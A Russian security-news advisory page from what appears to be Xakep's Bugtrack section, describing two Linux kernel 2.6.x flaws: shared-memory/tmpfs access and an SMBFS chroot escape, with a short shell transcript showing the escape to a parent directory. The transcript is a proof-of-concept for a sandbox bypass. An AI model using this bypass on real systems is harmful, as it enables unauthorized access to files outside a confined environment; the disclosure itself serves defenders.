Карта сайта Хакер в RSS Энциклопедия Хакера PDA версия сайта Почтовые рассылки Хакера    Хакер в Twitter Хакер в ВКонтакте Приложение Хакер для Facebook Хакер на Formspring.me
Журнал Новости Форум Видео Life Xakep Live (блоги)
Bugtrack Статьи Блог Поиск English
Взлом как образ мысли Взлом как образ мысли
Интервью с человеком, который, как оказалось, является не только талантливым пентестером в одной из крупных ИБ-компании, но и хакером-ветераном, который уверенными шагами вышел на свет и прикоснулся к истории российской хак-сцены....
Полный гид по накрутке онлайн-голосований Полный гид по накрутке онлайн-голосований
Конкурсы с голосованием привлекают большое количество посетителей, а трафик, как известно, — это деньги. Особый интерес вызывают конкурсы, где за победу предлагаются лакомые призы....

Множественные уязвимости в ядре Linux

Bookmark and Share

Уязвимость позволяет удаленному злоумышленнику получить доступ к конфиденциальной информации системы.

1) Уязвимость существует из-за ошибки в работе с памятью. Атакующий может получить доступ на чтение и запись в разделяемую память и доступ на запись в файловую систему tmpfs.

2) Уязвимость существует из-за ошибки в файловой системе SMBFS. Локальный атакующий, имеющий ограничения chroot может обойти систему безопасности и получить неавторизованный доступ к файловой системе.

Пример:

Linux kernel 2.6.x

root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>




Уязвимости в Linux kernel (всего 216)



СЛЕДУЮЩИЕ СТАТЬИ
Межсайтовый скриптинг в WordPress Twitter Feed Plugin
Межсайтовый скриптинг в WWWthreads
Межсайтовый скриптинг в WordPress Safe Search Plugin
Межсайтовый скриптинг в DotNetNuke
Выполнение произвольного кода в Babylon
Межсайтовый скриптинг в Contenido
Переполнение буфера в Freefloat FTP Serve
Переполнение буфера в VideoCharge Studio
Межсайтовый скриптинг в ZyXEL Prestige
Переполнение буфера в ProVJ
ПРЕДЫДУЩИЕ СТАТЬИ
PHP-инклюдинг в Phpjobscheduler
Произвольная смена паролей в Online Event Registration
PHP-инклюдинг в Quick.Cart
SQL-инъекция в Property Pro
SQL-инъекция в Estate Agent Manager
Межсайтовый скриптинг в ContentNow
Множественные уязвимости в ContentNow
Выполнение произвольного кода в D-Link Wireless Driver
Множественные уязвимости в ContentNow
Отказ в обслуживании в Fedora Core
ОБСУЖДЕНИЕ СТАТЬИ
Логин:
Пароль:
Если у вас есть форумный логин - вы можете использовать его, иначе анонимный гостевой доступ.

Для оставления комментария вы можете зарегистрироваться по упрощенной процедуре.
Для отправки сообщения введите код, указанный на картинке
Сообщение





Keywords: zPOSTz zSCOLOURz, zHACKz, zSOFTz, zNEWSz, zYANDEXz z35164z
Для Авторов: edit Lock delete Lock



    Rambler's Top100